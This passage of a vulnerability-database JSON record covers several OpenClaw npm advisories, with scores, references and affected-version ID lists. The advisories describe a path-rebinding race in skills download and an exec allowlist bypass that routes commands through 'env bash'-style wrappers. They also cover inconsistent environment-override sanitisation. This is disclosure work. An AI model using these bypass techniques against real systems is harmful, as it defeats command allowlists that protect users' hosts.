If a local attacker could rebind that tools-root path between validation and the final write (a time-of-check to time-of-use race), the installer could be redirected to write outside the intended tools directory.\n\nThe fix pins the canonical per-skill tools root immediately after validation and derives later download/copy paths from that canonical root, so rebinding the lexical path fails closed instead of redirecting the write.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33574","reference_id":"","reference_type":"","scores":[{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02175","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02162","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02182","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33574"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/9abf014f3502009faf9c73df5ca2cff719e54639","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-30T14:28:38Z/"}],
"url":"https://github.com/openclaw/openclaw/commit/9abf014f3502009faf9c73df5ca2cff719e54639"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-path-traversal-via-tools-root-rebinding-in-skills-download","reference_id":"","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-30T14:28:38Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-path-traversal-via-tools-root-rebinding-in-skills-download"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33574","reference_id":"CVE-2026-33574","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33574"},{"reference_url":"https://github.com/advisories/GHSA-vhwf-4x96-vqx2","reference_id":"GHSA-vhwf-4x96-vqx2","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vhwf-4x96-vqx2"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vhwf-4x96-vqx2","reference_id":"GHSA-vhwf-4x96-vqx2","reference_type":"","scores":[{"value":"6.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.8","scoring_system":"cvssv4","scorin
g_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-30T14:28:38Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vhwf-4x96-vqx2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74859?format=json","purl":"pkg:npm/openclaw@2026.3.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerab
ility":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerab
ility":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerab
ility":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerab
ility":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerab
ility":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerab
ility":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.8"}],"aliases":["CVE-2026-33574","GHSA-vhwf-4x96-vqx2"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-h4av-vgqn-aqcn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91631?format=json","vulnerability_id":"VCID-h8vg-ewrr-tfec","summary":"Duplicate Advisory: Exec allowlist wrapper analysis did not unwrap env/shell dispatch chains\n## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of GHSA-jj82-76v6-933r. 
This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw versions prior to 2026.2.22 contain an allowlist bypass vulnerability in system.run exec analysis that fails to unwrap env and shell-dispatch wrapper chains. Attackers can route execution through wrapper binaries like env bash to smuggle payloads that satisfy allowlist entries while executing non-allowlisted commands.","references":[{"reference_url":"https://github.com/openclaw/openclaw/commit/2b63592be57782c8946e521bc81286933f0f99c7","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/2b63592be57782c8946e521bc81286933f0f99c7"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-wrapper-binary-unwrapping-in-system-run","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-allowlist-bypass-via-wrapper-binary-unwrapping-in-system-run"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27566","reference_id":"CVE-2026-27566","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements
":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27566"},{"reference_url":"https://github.com/advisories/GHSA-3846-mfvc-xwpf","reference_id":"GHSA-3846-mfvc-xwpf","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3846-mfvc-xwpf"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jj82-76v6-933r","reference_id":"GHSA-jj82-76v6-933r","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jj82-76v6-933r"}],"fixed_packages":[],"aliases":["GHSA-3846-mfvc-xwpf"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-h8vg-ewrr-tfec"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91383?format=json","vulnerability_id":"VCID-h9g5-xe4k-6udx","summary":"OpenClaw has Inconsistent Host Exec Environment Override Sanitization\n## Summary\nGateway host exec env override handling did not consistently apply the shared host environment policy, so blocked or malformed override keys could slip through inconsistent sanitization paths.\n\n## Affected Packages / 
Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `7abfff756d6c68d17e21d1657bbacbaec86de232`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/infra/host-env-security.ts now provides one shared sanitizer and fail-closed diagnostics for blocked or malformed override keys.\n- src/agents/bash-tools.exec.ts and src/node-host/invoke-system-run.ts both route env overrides through the shared sanitizer before execution.\n\nOpenClaw thanks @zpbrent for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35650","reference_id":"","reference_type":"","scores":[{"value":"0.00081","scoring_system":"epss","scoring_elements":"0.23939","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00081","scoring_system":"epss","scoring_elements":"0.2399","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00081","scoring_system":"epss","scoring_elements":"0.24008","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35650"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/
